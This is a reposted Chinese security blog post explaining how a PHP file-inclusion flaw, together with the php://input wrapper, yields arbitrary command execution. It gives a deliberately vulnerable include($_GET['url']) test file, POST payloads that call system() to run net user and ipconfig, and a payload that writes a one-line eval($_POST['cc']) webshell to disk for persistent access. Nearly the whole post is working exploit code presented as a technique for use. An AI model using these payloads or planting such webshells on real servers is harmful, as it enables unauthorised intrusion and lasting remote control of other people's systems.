技术笔记

PHP文件包含之通过PHP内置协议执行任意命令

字号+ 作者:sn0w 来源:转载 2016-11-27 16:03 我要评论( )

测试发现php5.3以上的版本不可用 php内置协议列表:http://php.net/manual/zh/wrappers.php 利用条件:allow_url_include = On 首先我们确定存在任意文件包含,这......

测试发现php5.3以上的版本不可用
 
php内置协议列表:http://php.net/manual/zh/wrappers.php
利用条件:allow_url_include = On
首先我们确定存在任意文件包含,这里我们使用测试代码

<?php include($_GET['url']); ?>

访问URL:http://127.0.0.1/111332.php?url=php://input      (111332.php是我随便起的文件名)
然后通过post提交数据:

<?php system("net user")?>

PHP文件包含之通过PHP内置协议执行任意命令 - sn0w - 雪花 -  root@sn0w.top
命令通过php代码被执行

<?php system("ipconfig")?>

PHP文件包含之通过PHP内置协议执行任意命令 - sn0w - 雪花 -  root@sn0w.top
 
同理我们也可以通过执行php写入一句话。

<?php fwrite(fopen("xxx.php","w"),'<?php eval($_POST["cc"]);?>');?>

执行后在根目录生成一个xxx.php的一句话,密码cc,不过写入文件需要allow_url_fopen=on.
PHP文件包含之通过PHP内置协议执行任意命令 - sn0w - 雪花 -  root@sn0w.top

本文来自: 蜗蜗侠's Blog-关注网络安全 http://blog.icxun.cn/Note/343.html

1.本站遵循行业规范,任何转载的稿件都会明确标注作者和来源;2.本站的原创文章,请转载时务必注明文章作者和来源,不尊重原创的行为我们将追究责任;3.作者投稿可能会经我们编辑修改或补充。

相关文章
  • 新思路php一句话过waf

    新思路php一句话过waf

    2018-03-22 09:10

  • 用DiskGenius读取虚拟机磁盘文件

    用DiskGenius读取虚拟机磁盘文件

    2017-03-15 09:32

  • 关于Safe DOG的文件上传bypass

    关于Safe DOG的文件上传bypass

    2017-03-07 09:08

  • python和django的目录遍历漏洞(任意文件读取)

    python和django的目录遍历漏洞(任意文件读取)

    2016-12-18 14:19

网友点评
暂时未开启评论功能~